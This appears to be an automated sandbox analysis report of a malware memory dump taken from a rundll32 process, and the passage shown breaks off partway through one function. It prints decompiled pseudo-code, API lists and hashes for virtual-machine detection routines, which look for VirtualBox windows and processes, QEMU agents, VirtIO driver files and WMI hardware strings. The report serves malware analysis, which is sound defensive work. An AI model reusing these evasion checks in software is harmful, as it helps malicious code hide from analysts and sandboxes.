                                        • API String ID: 3677997916-3557842602
                                        • Opcode ID: 41a9ecf1070892d9817eab3d4ac41b365b981792e7891d46277a9e26b7efdbf0
                                        • Instruction ID: 1feb8b007ecbccd9be9ecdce9d285b3137e6b7204bb54603de57035309d6b371
                                        • Opcode Fuzzy Hash: 41a9ecf1070892d9817eab3d4ac41b365b981792e7891d46277a9e26b7efdbf0
                                        • Instruction Fuzzy Hash: 4B21E836218B8492EA209B51F8893DBB3B4F799784F924126EE8D43B69DF3CC546C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301DCE2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 44%
                                        			E0000021E21EF301DCE2(signed int __edi, signed int __ebp, long long __rax, void* _a32, void* _a48, void* _a56, void* _a64) {
				_Unknown_base(*)()* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				signed int _t90;
				signed int _t99;
				signed int _t159;
				signed int _t161;
				signed int _t167;
				void* _t191;
				long long _t192;
				_Unknown_base(*)()* _t193;
				void* _t197;
				void* _t212;
				void* _t213;
				void* _t218;
				void* _t221;
				void* _t223;
				void* _t224;
				void* _t225;
				long long _t229;
				signed int _t230;
				signed long long _t239;
				long long _t241;
				long long _t243;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t250;

				_t229 = __rax;
				_t161 = __edi;
				goto 0xf301dcfe;
				_t57 = GetProcAddress(??, ??);
				_t192 = __rax;
				0xf3020190(); // executed
				_t193 = _t57;
				sil = _t193 == 0;
				if (_t193 == 0) goto 0xf301df24; // executed
				_t58 = E0000021E21EF301E190(_t159, _t230, _t239, _t241); // executed
				_t59 = E0000021E21EF301E2E0(_t230, _t241); // executed
				_t99 = (__edi & 0xffffff00 | _t58 == 0x00000000) & __edi & ((__edi & 0xffffff00 | _t192 != 0x00000000) ^ 0x00000001) & __ebp & (__edi & 0xffffff00 | _t59 == 0x00000000); // executed
				_t60 = E0000021E21EF301E430(_t230, _t239, _t241); // executed
				_t61 = E0000021E21EF301E6A0(_t247); // executed
				_t197 = _t61;
				bpl = _t197 == 0;
				if (_t197 == 0) goto 0xf301df24;
				_t62 = E0000021E21EF3020FD0(_t229, _t230, 0xf31b7ff8, _t241); // executed
				sil = _t62 == 0;
				_t63 = E0000021E21EF301E7D0(_t230, _t241, _t243, _t247); // executed
				_t167 = _t161 & _t161 & _t99 & (_t161 & 0xffffff00 | _t60 == 0x00000000) & (_t161 & 0xffffff00 | _t63 == 0x00000000);
				FindWindowW(??, ??); // executed
				_t231 = _t229; // executed
				FindWindowW(??, ??); // executed
				if (_t229 != 0) goto 0xf301dda8;
				if (_t229 == 0) goto 0xf301ddad;
				_t66 = E0000021E21EF301E8F0(); // executed
				_t67 = E0000021E21EF301E990(_t231); // executed
				_t68 = E0000021E21EF301EA40(0, _t229, _t239, _t241, _t248, _t249); // executed
				_t69 = E0000021E21EF301EC20(0, _t231, _t239, _t241, _t249); // executed
				0xf301ef30();
				_t70 = E0000021E21EF301EFD0(_t69, _t229);
				_t71 = E0000021E21EF301F520(0, _t229, _t231, _t241, _t249, _t250); // executed
				_t72 = E0000021E21EF301F730(0, _t229, _t239, _t241, _t248, _t249); // executed
				_t73 = E0000021E21EF301F120(0, _t229, _t239, _t241, _t248, _t249); // executed
				_t74 = E0000021E21EF301F300(0, _t229, _t231, _t241, _t249); // executed
				_t75 = E0000021E21EF301F9C0(0, _t229, _t239, _t241, _t248, _t249); // executed
				_t212 = _t75;
				if (_t212 == 0) goto 0xf301df24; // executed
				_t76 = E0000021E21EF3020C70(_t231); // executed
				_t213 = _t76;
				sil = _t213 == 0;
				if (_t213 == 0) goto 0xf301df24; // executed
				_t77 = E0000021E21EF301FC50(_t231, _t241); // executed
				_t78 = E0000021E21EF301FD40(_t231); // executed
				_t79 = E0000021E21EF301FE00(_t231, _t241, _t243, _t247); // executed
				_t80 = E0000021E21EF3020070(_t161, _t191, _t229); // executed
				_t218 = E0000021E21EF301FFE0(_t229, _t231, _t241);
				sil = _t218 == 0;
				if (_t218 == 0) goto 0xf301df24;
				_t82 = E0000021E21EF3020250(_t231, _t241);
				_t83 = E0000021E21EF3020370(_t231, _t239, _t241); // executed
				_t84 = E0000021E21EF3020590(_t247); // executed
				_t221 = _t84;
				sil = _t221 == 0;
				if (_t221 == 0) goto 0xf301df24; // executed
				_t85 = E0000021E21EF3020BC0(_t231); // executed
				_t86 = E0000021E21EF3020FD0(_t229, _t231, 0xf31b8f18, _t241); // executed
				_t223 = _t86;
				sil = _t223 == 0;
				if (_t223 == 0) goto 0xf301df24; // executed
				_t87 = E0000021E21EF30209C0(0, _t229, _t239, _t241, _t249); // executed
				_t224 = _t87;
				if (_t224 == 0) goto 0xf301df24; // executed
				_t88 = E0000021E21EF3020770(); // executed
				_t225 = _t88;
				sil = _t225 == 0;
				if (_t225 != 0) goto 0xf301df28;
				goto 0xf301df38; // executed
				_t90 = E0000021E21EF3020950(); // executed
				dil = _t90 == 0;
				return _t90 & 0xffffff00 | (_t161 & (_t161 & 0xffffff00 | _t224 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t85 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t82 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t77 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t212 == 0x00000000) & _t167 & (_t161 & 0xffffff00 | _t66 == 0x00000000) & 0 & (_t161 & 0xffffff00 | _t67 == 0x00000000) & (_t161 & 0xffffff00 | _t68 == 0x00000000) & (_t161 & 0xffffff00 | _t69 == 0x00000000) & (_t161 & 0xffffff00 | _t69 == 0x00000000) & (_t161 & 0xffffff00 | _t70 == 0x00000000) & (_t161 & 0xffffff00 | _t71 == 0x00000000) & (_t161 & 0xffffff00 | _t72 == 0x00000000) & (_t161 & 0xffffff00 | _t73 == 0x00000000) & (_t161 & 0xffffff00 | _t74 == 0x00000000) & (_t161 & 0xffffff00 | _t78 == 0x00000000) & (_t161 & 0xffffff00 | _t79 == 0x00000000) & (_t161 & 0xffffff00 | _t80 == 0x00000000) & (_t161 & 0xffffff00 | _t83 == 0x00000000) & _t161) == 0x00000000;
			}

























































                                        0x21ef301dce2
                                        0x21ef301dce2
                                        0x21ef301dce4
                                        0x21ef301dcf0
                                        0x21ef301dcf6
                                        0x21ef301dcfe
                                        0x21ef301dd03
                                        0x21ef301dd07
                                        0x21ef301dd12
                                        0x21ef301dd18
                                        0x21ef301dd26
                                        0x21ef301dd32
                                        0x21ef301dd34
                                        0x21ef301dd42
                                        0x21ef301dd47
                                        0x21ef301dd4b
                                        0x21ef301dd51
                                        0x21ef301dd5e
                                        0x21ef301dd67
                                        0x21ef301dd6d
                                        0x21ef301dd7b
                                        0x21ef301dd84
                                        0x21ef301dd93
                                        0x21ef301dd96
                                        0x21ef301dd9f
                                        0x21ef301dda6
                                        0x21ef301ddad
                                        0x21ef301ddc0
                                        0x21ef301ddce
                                        0x21ef301dddc
                                        0x21ef301ddea
                                        0x21ef301ddf8
                                        0x21ef301de06
                                        0x21ef301de14
                                        0x21ef301de22
                                        0x21ef301de30
                                        0x21ef301de3e
                                        0x21ef301de43
                                        0x21ef301de4c
                                        0x21ef301de52
                                        0x21ef301de57
                                        0x21ef301de5b
                                        0x21ef301de61
                                        0x21ef301de67
                                        0x21ef301de75
                                        0x21ef301de83
                                        0x21ef301de91
                                        0x21ef301dea4
                                        0x21ef301dea8
                                        0x21ef301deae
                                        0x21ef301deb0
                                        0x21ef301debe
                                        0x21ef301decc
                                        0x21ef301ded1
                                        0x21ef301ded5
                                        0x21ef301dedb
                                        0x21ef301dedd
                                        0x21ef301def2
                                        0x21ef301def7
                                        0x21ef301defb
                                        0x21ef301df01
                                        0x21ef301df03
                                        0x21ef301df08
                                        0x21ef301df11
                                        0x21ef301df13
                                        0x21ef301df18
                                        0x21ef301df1c
                                        0x21ef301df22
                                        0x21ef301df26
                                        0x21ef301df28
                                        0x21ef301df2f
                                        0x21ef301df50

                                        APIs
                                          • Part of subcall function 0000021EF301E2E0: RegOpenKeyExW.ADVAPI32 ref: 0000021EF301E3D8
                                          • Part of subcall function 0000021EF301E430: GetWindowsDirectoryW.KERNEL32 ref: 0000021EF301E55D
                                          • Part of subcall function 0000021EF301E430: Wow64DisableWow64FsRedirection.KERNEL32 ref: 0000021EF301E571
                                          • Part of subcall function 0000021EF301E430: PathCombineW.SHLWAPI ref: 0000021EF301E590
                                          • Part of subcall function 0000021EF301E430: GetFileAttributesW.KERNEL32 ref: 0000021EF301E5CA
                                          • Part of subcall function 0000021EF301E6A0: ExpandEnvironmentStringsW.KERNEL32 ref: 0000021EF301E744
                                          • Part of subcall function 0000021EF301E6A0: PathCombineW.SHLWAPI ref: 0000021EF301E770
                                          • Part of subcall function 0000021EF301E6A0: GetFileAttributesW.KERNEL32 ref: 0000021EF301E77E
                                          • Part of subcall function 0000021EF3020FD0: GetProcessHeap.KERNEL32 ref: 0000021EF3020FEC
                                          • Part of subcall function 0000021EF3020FD0: HeapAlloc.KERNEL32 ref: 0000021EF3020FFD
                                          • Part of subcall function 0000021EF301E7D0: CreateFileW.KERNEL32 ref: 0000021EF301E869
                                        • FindWindowW.USER32 ref: 0000021EF301DD84
                                        • FindWindowW.USER32 ref: 0000021EF301DD96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AttributesCombineFindHeapPathWindowWow64$AllocCreateDirectoryDisableEnvironmentExpandOpenProcessRedirectionStringsWindows
                                        • String ID: VBoxTrayToolWnd$VBoxTrayToolWndClass
                                        • API String ID: 3985774531-1325860762
                                        • Opcode ID: 656fc6a3ee9c4863f444f8d17b3f53e055efe4c207eb10f7ce8fd6d05fe868f6
                                        • Instruction ID: 19f746e7369513083a33d8ba544f78037169c8c0f27c6cc63cb6c299cf1412bd
                                        • Opcode Fuzzy Hash: 656fc6a3ee9c4863f444f8d17b3f53e055efe4c207eb10f7ce8fd6d05fe868f6
                                        • Instruction Fuzzy Hash: 1021CF73712B0002FE2437354D897DF02966BA4780F0F062AAD0997ACBEE5DC803C390
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301FD40 Relevance: 5.0, Strings: 4, Instructions: 40COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 43%
                                        			E0000021E21EF301FD40(signed int __rbx, long long _a8) {
				signed long long _v24;
				char _v536;
				long long _v552;
				long long _v560;
				long long _v568;
				void* __rdi;
				void* _t14;
				void* _t17;
				void* _t20;
				void* _t21;
				signed long long _t25;
				signed int _t30;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t44;

				_t30 = __rbx;
				_a8 = __rbx;
				_t42 = _t41 - 0x250;
				_t25 =  *0xf3203000; // 0x1fc8e4a4378e
				_v24 = _t25 ^ _t41 - 0x00000250;
				_v568 = L"qemu-ga.exe";
				_v560 = L"vdagent.exe";
				_v552 = L"vdservice.exe";
				asm("o16 nop [eax+eax]");
				r8d = 0x200;
				E0000021E21EF310E410(_t17, 0, _t20, _t21,  &_v536, _t38, _t39, _t44);
				0xf301e130();
				_t14 = E0000021E21EF30210E0(_t20, _t21, __rbx,  *((intOrPtr*)(_t42 + 0x20 + __rbx * 8))); // executed
				if (_t14 != 0) goto 0xf301fdd7;
				if (_t30 + 1 - 3 < 0) goto 0xf301fd90;
				goto 0xf301fddc;
				E0000021E21EF310C290();
				return 1;
			}



















                                        0x21ef301fd40
                                        0x21ef301fd40
                                        0x21ef301fd46
                                        0x21ef301fd4d
                                        0x21ef301fd57
                                        0x21ef301fd68
                                        0x21ef301fd74
                                        0x21ef301fd80
                                        0x21ef301fd85
                                        0x21ef301fd97
                                        0x21ef301fd9d
                                        0x21ef301fdbb
                                        0x21ef301fdc3
                                        0x21ef301fdca
                                        0x21ef301fdd3
                                        0x21ef301fdd5
                                        0x21ef301fde7
                                        0x21ef301fdfc

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                        • String ID: Checking qemu processes %s $qemu-ga.exe$vdagent.exe$vdservice.exe
                                        • API String ID: 1083639309-928502638
                                        • Opcode ID: c46f65550f94676cef748d7a804a694c43e45b552491a80b33a601f36fb83de6
                                        • Instruction ID: 5a0051b9f0b67002cc10784be9c0f54170cec8d192d934abdea6fafbeeb65ddb
                                        • Opcode Fuzzy Hash: c46f65550f94676cef748d7a804a694c43e45b552491a80b33a601f36fb83de6
                                        • Instruction Fuzzy Hash: 67111B35218A8481EF20AB51F8883EB73A1FBA9788F565122DE8D47F96DA3CC146C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301E990 Relevance: 3.8, Strings: 3, Instructions: 38COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0000021E21EF301E990(signed int __rbx, long long _a8) {
				signed long long _v24;
				char _v536;
				long long _v544;
				long long _v552;
				void* __rdi;
				void* _t13;
				void* _t16;
				void* _t19;
				void* _t20;
				signed long long _t24;
				signed int _t28;
				void* _t36;
				void* _t37;
				void* _t39;
				void* _t42;

				_t28 = __rbx;
				_a8 = __rbx;
				_t40 = _t39 - 0x240;
				_t24 =  *0xf3203000; // 0x1fc8e4a4378e
				_v24 = _t24 ^ _t39 - 0x00000240;
				_v552 = L"vboxservice.exe";
				_v544 = L"vboxtray.exe";
				r8d = 0x200;
				E0000021E21EF310E410(_t16, 0, _t19, _t20,  &_v536, _t36, _t37, _t42);
				0xf301e130();
				_t13 = E0000021E21EF30210E0(_t19, _t20, __rbx,  *((intOrPtr*)(_t40 + 0x20 + __rbx * 8))); // executed
				if (_t13 != 0) goto 0xf301ea17;
				if (_t28 + 1 - 2 < 0) goto 0xf301e9d0;
				goto 0xf301ea1c;
				E0000021E21EF310C290();
				return 1;
			}


















                                        0x21ef301e990
                                        0x21ef301e990
                                        0x21ef301e996
                                        0x21ef301e99d
                                        0x21ef301e9a7
                                        0x21ef301e9b8
                                        0x21ef301e9c4
                                        0x21ef301e9d7
                                        0x21ef301e9dd
                                        0x21ef301e9fb
                                        0x21ef301ea03
                                        0x21ef301ea0a
                                        0x21ef301ea13
                                        0x21ef301ea15
                                        0x21ef301ea27
                                        0x21ef301ea3c

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                        • String ID: Checking VirtualBox process %s $vboxservice.exe$vboxtray.exe
                                        • API String ID: 1083639309-2201811630
                                        • Opcode ID: a0d76824915bb146bc2543c919e3cf64f271d57e02c2de59f93926973ead6723
                                        • Instruction ID: da1436ed03d1ed1cb474d8cffa3622374b806a954b3711b1abda197982a15319
                                        • Opcode Fuzzy Hash: a0d76824915bb146bc2543c919e3cf64f271d57e02c2de59f93926973ead6723
                                        • Instruction Fuzzy Hash: CF015E35214A8081FF20AB51F8993DB73A0F7A8788F865122DE8D47F96DA3CC146CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301F300 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 147memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 26%
                                        			E0000021E21EF301F300(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				intOrPtr _v56;
				signed short _v64;
				void* _v72;
				long long _v80;
				long long _v88;
				void* _t53;
				void* _t54;
				signed char _t60;
				intOrPtr _t98;
				intOrPtr* _t114;
				long long _t134;
				long long _t135;
				void* _t146;

				_t135 = __rsi;
				_a24 = _t134;
				_v72 = _t134;
				_a16 = _t134;
				_t54 = E0000021E21EF30211C0(_t53,  &_a24,  &_v72, __rsi); // executed
				if (_t54 == 0) goto 0xf301f50b;
				_v24 = __rbx;
				_v32 = _t135;
				_v40 = __r14;
				__imp__#2();
				__imp__#2();
				_t9 = _t134 + 1; // 0x1
				r14d = _t9;
				_t104 = __rax;
				if (__rax == 0) goto 0xf301f3ba;
				if (__rax == 0) goto 0xf301f3b1;
				_v80 =  &_a16;
				_t13 = _t134 + 0x30; // 0x30
				r9d = _t13;
				_v88 = _t134;
				_t145 =  *_a24;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xf301f3b1;
				r14d = 0;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v72 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				_t137 = _v32;
				if (__rax == 0) goto 0xf301f3cd;
				__imp__#6();
				if (r14d == 0) goto 0xf301f4fd;
				_t114 = _a16;
				_a32 = _t134;
				_a8 = 0;
				if (_t114 == 0) goto 0xf301f4d6;
				asm("o16 nop [eax+eax]");
				_v88 =  &_a8;
				r8d = 1; // executed
				 *((intOrPtr*)( *_t114 + 0x20))();
				if (_a8 == 0) goto 0xf301f4d2;
				_v80 = _t134;
				r8d = 0;
				_v88 = _t134;
				_t98 =  *_a32; // executed
				if ( *((intOrPtr*)(_t98 + 0x20))() < 0) goto 0xf301f4b9;
				_t60 = _v64 & 0x0000ffff;
				if (_t60 == 1) goto 0xf301f4b9;
				if ((_t60 & 0x00000008) == 0) goto 0xf301f4af;
				E0000021E21EF310E5B0(__rax, _v56, L"82801FB", _v32,  *_a24, _t146);
				if (_t98 != 0) goto 0xf301f4ad;
				E0000021E21EF310E5B0(_t104, _v56, L"82441FX", _v32, _t145, _t146);
				if (_t98 != 0) goto 0xf301f4ad;
				E0000021E21EF310E5B0(_t104, _v56, L"82371SB", _v32, _t145, _t146);
				if (_t98 != 0) goto 0xf301f4ad;
				E0000021E21EF310E5B0(_t104, _v56, L"OpenHCD", _t137, _t145, _t146);
				if (_t98 == 0) goto 0xf301f4af;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_a16 != 0) goto 0xf301f400;
				goto 0xf301f4d6;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v72 + 0x10))();
				__imp__CoUninitialize(); // executed
				dil = 1 - 3 >= 0;
				return 0;
			}



















                                        0x21ef301f300
                                        0x21ef301f314
                                        0x21ef301f318
                                        0x21ef301f31c
                                        0x21ef301f320
                                        0x21ef301f327
                                        0x21ef301f32d
                                        0x21ef301f339
                                        0x21ef301f33e
                                        0x21ef301f343
                                        0x21ef301f353
                                        0x21ef301f359
                                        0x21ef301f359
                                        0x21ef301f35d
                                        0x21ef301f363
                                        0x21ef301f368
                                        0x21ef301f372
                                        0x21ef301f377
                                        0x21ef301f377
                                        0x21ef301f37e
                                        0x21ef301f386
                                        0x21ef301f392
                                        0x21ef301f398
                                        0x21ef301f39e
                                        0x21ef301f3a8
                                        0x21ef301f3ab
                                        0x21ef301f3b4
                                        0x21ef301f3ba
                                        0x21ef301f3c2
                                        0x21ef301f3c7
                                        0x21ef301f3d5
                                        0x21ef301f3db
                                        0x21ef301f3e1
                                        0x21ef301f3e5
                                        0x21ef301f3eb
                                        0x21ef301f3f5
                                        0x21ef301f407
                                        0x21ef301f413
                                        0x21ef301f419
                                        0x21ef301f41f
                                        0x21ef301f42d
                                        0x21ef301f439
                                        0x21ef301f43c
                                        0x21ef301f441
                                        0x21ef301f449
                                        0x21ef301f44b
                                        0x21ef301f453
                                        0x21ef301f457
                                        0x21ef301f464
                                        0x21ef301f46c
                                        0x21ef301f479
                                        0x21ef301f481
                                        0x21ef301f48e
                                        0x21ef301f496
                                        0x21ef301f4a3
                                        0x21ef301f4ab
                                        0x21ef301f4b3
                                        0x21ef301f4c0
                                        0x21ef301f4ca
                                        0x21ef301f4d0
                                        0x21ef301f4d9
                                        0x21ef301f4e3
                                        0x21ef301f4ed
                                        0x21ef301f4f0
                                        0x21ef301f4f9
                                        0x21ef301f50a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Stringwcsstr$AllocFreeUninitialize$ClearInitializeVariant
                                        • String ID: 82371SB$82441FX$82801FB$Name$OpenHCD$SELECT * FROM Win32_PnPEntity$WQL
                                        • API String ID: 1414631806-1350769890
                                        • Opcode ID: 035f43342f219f88fd52ced9a7fa007bc81059b4f8d4b92e025064900970dabd
                                        • Instruction ID: 91bca5e073f58f0037d586fae5dee4329411e43118e462c09fcf9ebeb675475f
                                        • Opcode Fuzzy Hash: 035f43342f219f88fd52ced9a7fa007bc81059b4f8d4b92e025064900970dabd
                                        • Instruction Fuzzy Hash: 97613836300A4086EF109F25E8586DE77B4FBA8B98F464112EE4E43FA9EF38C456C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30209C0 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 130memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocClearFreeUninitializeVariant$Initialize
                                        • String ID: HVM domU$Model$SELECT * FROM Win32_ComputerSystem$VMWare$VirtualBox$WQL
                                        • API String ID: 4173814494-4167877488
                                        • Opcode ID: 4433f5f65cde9349464ff77a51c12a1dd7467128e0f45f9a499b30ed3468992d
                                        • Instruction ID: f997f6bcf177ccc50284548d3669aa62adff401b50e40f75ea60d7db736a4313
                                        • Opcode Fuzzy Hash: 4433f5f65cde9349464ff77a51c12a1dd7467128e0f45f9a499b30ed3468992d
                                        • Instruction Fuzzy Hash: D151F536201B9186EF218F25E89869E77B0F798F98F465116EE4E43F68DF38C45AC340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3020370 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 125COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 42%
                                        			E0000021E21EF3020370(long long __rbx, signed long long __rdi, long long __rsi) {
				int _t56;
				signed char _t58;
				void* _t65;
				void* _t73;
				void* _t77;
				signed long long _t90;
				signed long long _t104;
				void* _t125;
				signed long long _t130;
				WCHAR* _t135;
				void* _t138;
				signed long long _t139;
				void* _t141;

				_t130 = __rdi;
				 *((long long*)(_t138 + 8)) = __rbx;
				 *((long long*)(_t138 + 0x10)) = __rsi;
				 *((long long*)(_t138 + 0x18)) = __rdi;
				_t136 = _t138 - 0x5b0;
				_t139 = _t138 - 0x6b0;
				_t90 =  *0xf3203000; // 0x1fc8e4a4378e
				 *(_t138 - 0x5b0 + 0x5a0) = _t90 ^ _t139;
				 *((long long*)(_t139 + 0x30)) = L"System32\\drivers\\balloon.sys";
				r8d = 0x208;
				 *((long long*)(_t139 + 0x38)) = L"System32\\drivers\\netkvm.sys";
				 *((long long*)(_t139 + 0x40)) = L"System32\\drivers\\pvpanic.sys";
				 *((long long*)(_t139 + 0x48)) = L"System32\\drivers\\viofs.sys";
				 *((long long*)(_t139 + 0x50)) = L"System32\\drivers\\viogpudo.sys";
				 *((long long*)(_t139 + 0x58)) = L"System32\\drivers\\vioinput.sys";
				 *((long long*)(_t139 + 0x60)) = L"System32\\drivers\\viorng.sys";
				 *((long long*)(_t139 + 0x68)) = L"System32\\drivers\\vioscsi.sys";
				 *((long long*)(_t139 + 0x70)) = L"System32\\drivers\\vioser.sys";
				 *((long long*)(_t139 + 0x78)) = L"System32\\drivers\\viostor.sys";
				E0000021E21EF310E410(_t65, 0, _t73, _t77, _t138 - 0x5b0 + 0x190, _t125, __rdi, _t141);
				r8d = 0x208;
				E0000021E21EF310E410(_t65, 0, _t73, _t77, _t138 - 0x530, _t125, _t130, _t141);
				 *(_t139 + 0x28) = _t130;
				_t56 = GetWindowsDirectoryW(_t135);
				0xf3020e50();
				if (_t56 == 0) goto 0xf302046a;
				__imp__Wow64DisableWow64FsRedirection();
				_t104 = _t130;
				__imp__PathCombineW();
				r8d = 0x200;
				E0000021E21EF310E410(_t65, 0, 0, _t77, _t136 + 0x3a0, _t136 + 0x190, _t130,  *((intOrPtr*)(_t139 + 0x30 + _t104 * 8)));
				0xf301e130();
				_t58 = GetFileAttributesW(??); // executed
				if (_t58 == 0xffffffff) goto 0xf30204c9;
				if ((_t58 & 0x00000010) == 0) goto 0xf30204d4;
				if (_t104 + 1 - 0xa < 0) goto 0xf3020470;
				goto 0xf30204d9;
				 *((intOrPtr*)(_t139 + 0x20)) = 0;
				if ( *0xf3204490 == 8) goto 0xf3020502;
				if (1 - 0x1e < 0) goto 0xf30204f0;
				goto 0xf3020561;
				if ( *0x21EF32044E4 == dil) goto 0xf3020561;
				if ( *0xf3204490 == 8) goto 0xf302052a;
				if (1 - 0x1e < 0) goto 0xf3020518;
				goto 0xf302053f;
				if ( *((intOrPtr*)(0x21ef32044e4)) == dil) goto 0xf302053f;
				GetCurrentProcess();
				 *((long long*)( *0x21EF32044E8))();
				if ( *((intOrPtr*)(_t139 + 0x20)) == 0) goto 0xf3020561;
				__imp__Wow64RevertWow64FsRedirection();
				E0000021E21EF310C290();
				return 1;
			}
















                                        0x21ef3020370
                                        0x21ef3020370
                                        0x21ef3020375
                                        0x21ef302037a
                                        0x21ef3020380
                                        0x21ef3020388
                                        0x21ef302038f
                                        0x21ef3020399
                                        0x21ef30203a9
                                        0x21ef30203bc
                                        0x21ef30203c2
                                        0x21ef30203ce
                                        0x21ef30203da
                                        0x21ef30203e6
                                        0x21ef30203f2
                                        0x21ef30203fe
                                        0x21ef302040a
                                        0x21ef3020416
                                        0x21ef3020422
                                        0x21ef3020427
                                        0x21ef3020432
                                        0x21ef3020438
                                        0x21ef302044b
                                        0x21ef3020450
                                        0x21ef3020456
                                        0x21ef302045d
                                        0x21ef3020464
                                        0x21ef302046c
                                        0x21ef3020480
                                        0x21ef302048f
                                        0x21ef3020495
                                        0x21ef30204b1
                                        0x21ef30204ba
                                        0x21ef30204c3
                                        0x21ef30204c7
                                        0x21ef30204d0
                                        0x21ef30204d2
                                        0x21ef30204e0
                                        0x21ef30204f3
                                        0x21ef30204fe
                                        0x21ef3020500
                                        0x21ef3020511
                                        0x21ef302051b
                                        0x21ef3020526
                                        0x21ef3020528
                                        0x21ef3020538
                                        0x21ef302053f
                                        0x21ef302054d
                                        0x21ef3020554
                                        0x21ef302055b
                                        0x21ef302056d
                                        0x21ef302058a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                                        • String ID: Checking file %s $System32\drivers\balloon.sys$System32\drivers\netkvm.sys$System32\drivers\pvpanic.sys$System32\drivers\viofs.sys$System32\drivers\viogpudo.sys$System32\drivers\vioinput.sys$System32\drivers\viorng.sys$System32\drivers\vioscsi.sys$System32\drivers\vioser.sys$System32\drivers\viostor.sys
                                        • API String ID: 2137468328-3181514389
                                        • Opcode ID: 5d16ff1b976b14de94503c63726e21016d550f9cc417a117d5239c3075ee5e3c
                                        • Instruction ID: c40a3077b529e846b0340306124d3a78b1c3454521d27b1429738595ecbded88
                                        • Opcode Fuzzy Hash: 5d16ff1b976b14de94503c63726e21016d550f9cc417a117d5239c3075ee5e3c
                                        • Instruction Fuzzy Hash: 46513876210B8099EF208B25EC582DB77A5F7A9B84F960126DE8D43FA8DF3CC556C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301F730 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 166memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 16%
                                        			E0000021E21EF301F730(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14) {
				void* __rbx;
				void* _t74;
